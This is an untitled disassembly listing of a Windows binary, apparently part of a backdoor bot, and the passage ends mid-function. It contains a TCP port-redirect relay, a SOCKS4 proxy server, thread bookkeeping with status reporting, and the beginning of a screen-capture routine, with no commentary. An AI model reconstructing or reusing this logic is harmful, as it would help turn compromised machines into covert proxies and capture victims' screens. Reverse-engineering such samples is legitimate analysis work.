loc_407960: ; CODE XREF: sub_407767+C6�j
; sub_407767+148�j
push 7D0h
call ds:dword_424064 ;; Sleep
jmp loc_4077AE
; ---------------------------------------------------------------------------
loc_407970: ; CODE XREF: sub_407767+55�j
push esi
call sub_417078
pop ecx
push 0
call ds:dword_424054 ;; ExitThread
sub_407767 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40797F proc near ; DATA XREF: sub_40EE72+3300�o
; sub_40EE72+5137�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call ds:dword_43ADD8 ;; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov ds:dword_436F18[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_407252
push 8
call sub_416FA4
add esp, 150h
cmp eax, ebx
jnz short loc_407A4D
mov esi, offset dword_438F18
push esi
call ds:dword_4240D0 ;; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4240CC ;; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_407A4D
lea eax, [ebp+var_1CC]
push offset unk_42B4F0
push eax
call sub_4172B0
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_407A37
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40D679
add esp, 14h
loc_407A37: ; CODE XREF: sub_40797F+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_40BF6D
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_407A4D: ; CODE XREF: sub_40797F+63�j
; sub_40797F+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_424064
mov edi, ebx
mov ds:dword_436F1C[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_407B1A
loc_407A6B: ; CODE XREF: sub_40797F+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_42B4A8
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_416D5C
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov ds:dword_4407F4[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_407767
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_407AE5
loc_407ADA: ; CODE XREF: sub_40797F+164�j
cmp [ebp+var_4], ebx
jnz short loc_407B0C
push 1Eh
call esi ; Sleep
jmp short loc_407ADA
; ---------------------------------------------------------------------------
loc_407AE5: ; CODE XREF: sub_40797F+159�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_42B45C
push eax
call sub_4172B0
lea eax, [ebp+var_1CC]
push eax
call sub_40BF6D
add esp, 10h
loc_407B0C: ; CODE XREF: sub_40797F+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_407A6B
loc_407B1A: ; CODE XREF: sub_40797F+E6�j
cmp [ebp+var_30], ebx
jz loc_407BC4
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_407B2F: ; CODE XREF: sub_40797F+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, ds:dword_436F18[eax*8]
push eax
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_42B408
push eax
call sub_4172B0
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_407B7D
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40D679
add esp, 14h
loc_407B7D: ; CODE XREF: sub_40797F+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_40BF6D
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov ds:dword_436F1C[eax*8], ebx
call esi ; Sleep
push 8
call sub_416FA4
cmp eax, 1
pop ecx
jnz short loc_407BB4
push offset dword_438F18
call ds:dword_4240D0 ;; RtlDeleteCriticalSection
loc_407BB4: ; CODE XREF: sub_40797F+228�j
push [ebp+var_2C]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_407BC4: ; CODE XREF: sub_40797F+19E�j
; sub_40797F+25D�j
mov eax, [ebp+var_2C]
cmp ds:dword_436F1C[eax*8], 1
jnz loc_407B2F
push 7D0h
call esi ; Sleep
jmp short loc_407BC4
sub_40797F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BDE proc near ; DATA XREF: sub_40EE72+36DD�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+var_10]
push ebx
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call ds:dword_43AD98 ;; htons
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call ds:dword_43AE18 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407D42
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov ds:dword_4407FC[eax], ebx
call ds:dword_43ACB4 ;; WSAAsyncSelect
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_43ADC4 ;; bind
test eax, eax
jnz loc_407D42
push 0Ah
push ebx
call ds:dword_43ADC0 ;; listen
test eax, eax
jnz loc_407D42
loc_407C88: ; CODE XREF: sub_407BDE+BE�j
; sub_407BDE+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_43AE2C ;; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_407C88
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset unk_42B584
push eax
call sub_4172B0
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_416D5C
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_4407F4[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_407D66
push esi
push esi
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_440804[ecx], eax
jz short loc_407D2D
loc_407D1A: ; CODE XREF: sub_407BDE+14D�j
cmp [ebp+var_2C], esi
jnz loc_407C88
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_407D1A
; ---------------------------------------------------------------------------
loc_407D2D: ; CODE XREF: sub_407BDE+13A�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_42B538
call sub_40BFE1
pop ecx
pop ecx
jmp short loc_407D45
; ---------------------------------------------------------------------------
loc_407D42: ; CODE XREF: sub_407BDE+61�j
; sub_407BDE+93�j ...
mov edi, [ebp+arg_0]
loc_407D45: ; CODE XREF: sub_407BDE+162�j
push edi
call ds:dword_43AE30 ;; closesocket
push ebx
call ds:dword_43AE30 ;; closesocket
push [ebp+var_3C]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
pop ebx
sub_407BDE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D66 proc near ; DATA XREF: sub_407BDE+11C�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call ds:dword_43AE18 ;; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_407F1C
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call ds:dword_43AD98 ;; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call ds:dword_43ADD8 ;; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_407DF6
lea eax, [ebp+var_13C]
push eax
call ds:dword_43AE1C ;; gethostbyname
jmp short loc_407E04
; ---------------------------------------------------------------------------
loc_407DF6: ; CODE XREF: sub_407D66+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_43AD50 ;; gethostbyaddr
loc_407E04: ; CODE XREF: sub_407D66+8E�j
cmp eax, edi
jz loc_407F1C
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jz loc_407F1C
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_42B62C
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_344]
push 10h
push eax
call sub_416D5C
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_4407FC[ebx]
mov ds:dword_4407F4[eax], ecx
add esp, 20h
mov ecx, [esi]
mov ds:dword_440800[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_407F4D
push edi
push edi
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov ds:dword_440804[ecx], eax
jz short loc_407F09
loc_407EB6: ; CODE XREF: sub_407D66+15D�j
cmp [ebp+var_20], edi
jnz short loc_407EC5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_407EB6
; ---------------------------------------------------------------------------
loc_407EC5: ; CODE XREF: sub_407D66+153�j
mov ebx, 1000h
loc_407ECA: ; CODE XREF: sub_407D66+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call ds:dword_43ADB0 ;; recv
cmp eax, edi
jle short loc_407F1C
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_407ECA
jmp short loc_407F1C
; ---------------------------------------------------------------------------
loc_407F09: ; CODE XREF: sub_407D66+14E�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_42B5DC
call sub_40BFE1
pop ecx
pop ecx
loc_407F1C: ; CODE XREF: sub_407D66+44�j
; sub_407D66+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push ds:dword_4407FC[eax]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_4]
call sub_417078
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
pop ebx
sub_407D66 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F4D proc near ; DATA XREF: sub_407D66+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_417B30
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_407F84: ; CODE XREF: sub_407F4D+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push ds:dword_440800[esi]
call ds:dword_43ADB0 ;; recv
test eax, eax
jle short loc_407FCB
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push ds:dword_4407FC[esi]
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_407F84
loc_407FCB: ; CODE XREF: sub_407F4D+61�j
push ds:dword_440800[esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_14]
call sub_417078
pop ecx
push 0
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_407F4D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FEA proc near ; DATA XREF: sub_40EE72+5E51�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call ds:dword_43AD98 ;; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call ds:dword_43AE18 ;; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov ds:dword_4407FC[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_43ADC4 ;; bind
test eax, eax
jnz loc_40818C
push 0Ah
push edi
call ds:dword_43ADC0 ;; listen
test eax, eax
jnz loc_40818C
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset unk_42B75C
push eax
call sub_4172B0
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_4080C5
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40D679
add esp, 14h
loc_4080C5: ; CODE XREF: sub_407FEA+B9�j
; sub_407FEA+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_40BF6D
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_43AE2C ;; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset unk_42B708
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2D4]
push 11h
push eax
call sub_416D5C
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_4407F4[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_4081EF
push esi
push esi
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_440804[ecx], eax
jz short loc_40816C
loc_408159: ; CODE XREF: sub_407FEA+180�j
cmp [ebp+var_28], esi
jnz loc_4080C5
push 5
call ds:dword_424064 ;; Sleep
jmp short loc_408159
; ---------------------------------------------------------------------------
loc_40816C: ; CODE XREF: sub_407FEA+16D�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset unk_42B6C0
push eax
call sub_4172B0
add esp, 0Ch
jmp loc_4080C5
; ---------------------------------------------------------------------------
loc_40818C: ; CODE XREF: sub_407FEA+7B�j
; sub_407FEA+8C�j
push edi
call ds:dword_43AE30 ;; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset unk_42B680
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4081CF
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40D679
add esp, 14h
loc_4081CF: ; CODE XREF: sub_407FEA+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_40BF6D
push [ebp+var_3C]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
pop ebx
sub_407FEA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081EF proc near ; DATA XREF: sub_407FEA+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_4407FC[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call ds:dword_43AD80 ;; select
test eax, eax
jnz short loc_408270
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_408270: ; CODE XREF: sub_4081EF+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call ds:dword_43ADB0 ;; recv
test eax, eax
jg short loc_4082A1
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_4082A1: ; CODE XREF: sub_4081EF+98�j
cmp [ebp+var_4D0], 4
jnz loc_40849B
cmp [ebp+var_4CF], 1
jnz loc_40849B
cmp [ebp+var_44], bl
jz short loc_408337
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_408337
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset unk_42B830
call sub_40BFE1
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_417330
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43ADE8 ;; send
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_408337: ; CODE XREF: sub_4081EF+CF�j
; sub_4081EF+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_417330
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call ds:dword_43AE18 ;; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4083CF
call ds:dword_43AD2C ;; WSAGetLastError
push eax
push offset unk_42B7E4
call sub_40BFE1
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_417330
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43ADE8 ;; send
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_4083CF: ; CODE XREF: sub_4081EF+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40843E
call ds:dword_43AD2C ;; WSAGetLastError
push eax
push offset unk_42B794
call sub_40BFE1
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_417330
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43ADE8 ;; send
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_40843E: ; CODE XREF: sub_4081EF+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_43ADE8 ;; send
push dword ptr [esi]
push edi
call sub_4084B3
pop ecx
pop ecx
push edi
call ds:dword_43AE30 ;; closesocket
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_40849B: ; CODE XREF: sub_4081EF+B9�j
; sub_4081EF+C6�j
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
push [ebp+arg_0]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
sub_4081EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084B3 proc near ; CODE XREF: sub_4081EF+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4084C9: ; CODE XREF: sub_4084B3+C5�j
; sub_4084B3+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_4084E1: ; CODE XREF: sub_4084B3+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_4084F1
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_4084E1
loc_4084F1: ; CODE XREF: sub_4084B3+33�j
cmp ecx, 1
jnz short loc_408506
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_408506: ; CODE XREF: sub_4084B3+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call ds:dword_43AD80 ;; select
lea eax, [ebp+var_104]
push eax
push ebx
call ds:dword_43AC90 ;; __WSAFDIsSet
test eax, eax
jz short loc_408566
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call ds:dword_43ADB0 ;; recv
cmp eax, 0FFFFFFFFh
jz short loc_4085AE
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_4085AE
loc_408566: ; CODE XREF: sub_4084B3+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call ds:dword_43AC90 ;; __WSAFDIsSet
test eax, eax
jz loc_4084C9
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call ds:dword_43ADB0 ;; recv
cmp eax, 0FFFFFFFFh
jz short loc_4085AE
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz loc_4084C9
loc_4085AE: ; CODE XREF: sub_4084B3+9A�j
; sub_4084B3+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4084B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085B3 proc near ; CODE XREF: sub_40EE72+45AF�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call ds:dword_43AD84 ;; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_4087E7
push 8
push edi
call ds:dword_43ADA0 ;; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call ds:dword_43ADA0 ;; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call ds:dword_43ADA0 ;; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_408615
push 18h
push edi
call ds:dword_43ADA0 ;; GetDeviceCaps
mov ebx, 100h
jmp short loc_408617
; ---------------------------------------------------------------------------
loc_408615: ; CODE XREF: sub_4085B3+50�j
xor ebx, ebx
loc_408617: ; CODE XREF: sub_4085B3+60�j
push edi
call ds:dword_43ADE4 ;; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_4087CC
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call ds:dword_43ADDC ;; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_4087D7
push eax
push [ebp+var_4]
call ds:dword_43AC74 ;; SelectObject
cmp eax, esi
jz loc_4087D7
cmp eax, 0FFFFFFFFh
jz loc_4087D7
push 0CC0020h
push esi
